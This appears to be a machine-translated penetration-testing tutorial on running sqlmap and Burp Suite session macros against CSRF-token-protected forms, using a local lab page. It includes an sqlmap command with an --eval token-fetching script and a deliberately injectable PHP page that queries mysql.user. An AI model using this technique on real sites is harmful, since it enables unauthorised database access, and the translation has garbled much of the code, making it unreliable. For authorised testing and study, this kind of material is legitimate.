C4bbage 2014/06/28 12:15
from: http://labs.asteriskinfosec.com.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-1/
http://labs.asteriskinfosec.com.au/fuzzing-and-sqlmap-inside-csrf-protected-locations-part-2/
Question: http://drops.wooyun.org/tips/2444
Attach other case (eval) : gist.github.com/McSimp/2602…
When testing some site injection we encountered tokens that could only be handled manually or automatically by writing tools, in the case of SQLMap and BurpSuite.
Sqlmap is as follows:
[email protected]/ pentest/databases/sqlmap $python sqlmap. Py -u "http://192.168.83.117/2.php" - data = "token = 123 & id = root" - the eval = "import urllib2; import re; a=urllib2.build_opener(); a.addheaders.append(('Cookie', 'PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05')); Token = re search (r '{32} \ w, a.o pen (' http://192.168.83.117/2.php'). The read ()). The group (0); print token;" -p id --dbs --cookie="PHPSESSID=72u0q0sem6tbnrqq4bmqs4an05" --current-userCopy the codeBurpsuite is as follows:
There is a session handler mechanism in BurpSuite that allows us to automate this. The example code is as follows:
#! php <? */ session_start(); */ session_start(); var_dump($_REQUEST); function set_token() { $_SESSION['token'] = md5(microtime(true)); } function valid_token() { $return = $_REQUEST['token'] === $_SESSION['token'] ? true : false; set_token(); return $return; } // If the token is empty, generate a token if(! isset($_SESSION['token']) || $_SESSION['token']=='') { set_token(); } error_reporting(E_USER_ERROR | E_USER_WARNING | E_USER_NOTICE); @ mysql_connect (" 127.0.0.1 ". ':', "3306", root, '123') or die (" database server connection failure "); @mysql_select_db('mysql') or die(" database does not exist or not available "); if(isset($_POST['id'])){ if(! valid_token()){ echo "token error"; $_POST['test']; $_POST['test']; $_POST['test']; $id=$_REQUEST[id]; $SQL ='select user,password,host from mysql.user where user='. '".$id."'.' limit 0,1; '; echo $sql; mysql_query('$sql'); $set_result = mysql_query($sql); while($row =mysql_fetch_array($set_result)){ $result[]=$row; } var_dump($result); } } //echo "SESSION ".$_SESSION['token']; ? > <form method="post" action=""> <input type="hidden" name="token" value="<? php echo $_SESSION['token']? >"> <input type="text" name="id" value="root"> <input type="submit" value=" submit" />Copy the codeAdd session handling Rules to the Sessions TAB of the Options TAB, and bring up the description of the session Handling rule Editor: Rule Description. Rule Actions The body part of a rule. Add a call of type Run a macro in the rule Actions, bring up the session Handling Action Editor, and select Add under Select Macro to add the macro. Macro Editor and Macro Recorder, the former is used for macro analysis and Settings, and the latter is used for a recording of requests. In macro Recoder, set Intercept is off (top right) and switch to your browser to request 127.0.0.1/2.php once before submitting the form. Cut to Macro Recorder, CTRL select both requests, and click OK. Back in the Macro Editor window, click Test Macro to see if the tokens in the request and response packets are correct.
If not, click On re-Analyze Macro or select Configure Item to correct it, as shown below.
After the Macro Editor is configured, the window returns to the Session Handling Action Editor. In the sqlMap -> BurpProxy test, Marco will specify my ID as root1 (Marco records my ID as root1) and will not send my payload. In the Fuse test, this problem does not happen. The token parameter can be replaced only as shown in the following figure:
Select the macro you just recorded in Select Macro and confirm. Back in the Session Hand Rule Editor, in its child tag scope, : sets the scope (depending on your situation) :
The running results are as follows:
